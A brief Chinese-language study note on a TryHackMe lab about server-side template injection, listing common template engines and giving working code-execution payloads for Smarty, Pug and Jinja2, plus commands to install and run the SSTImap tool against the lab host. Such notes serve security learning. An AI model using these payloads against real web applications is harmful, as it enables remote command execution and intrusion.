tryhackme Server-side Template Injection
Server-side Template Injection
SSTI
常见模板引擎
Jinja2
Twig
Pug / Jade
PHP - Smarty
{'Hello'|upper}
HELLO
{system("ls")}
NodeJs - Pug(原名 Jade)
#{root.process.mainModule.require('child_process').spawnSync('ls').stdout}
#{root.process.mainModule.require('child_process').spawnSync('ls', ['-lah']).stdout}
python - Jinja2
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}}
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output(['ls', '-lah'])}}
自动化利用
https://github.com/vladko312/SSTImap
git clone https://github.com/vladko312/SSTImap.git
cd SSTImap
pip install -r requirements.txt
python3 sstimap.py -X POST -u 'http://ssti.thm:8002/mako/' -d 'page='
主要在于胡扯烂造,大家就当相声看看吧。【本人不保证技术的实用性,一切文章仅供参考,如有谬错,请留言】

浙公网安备 33010602011771号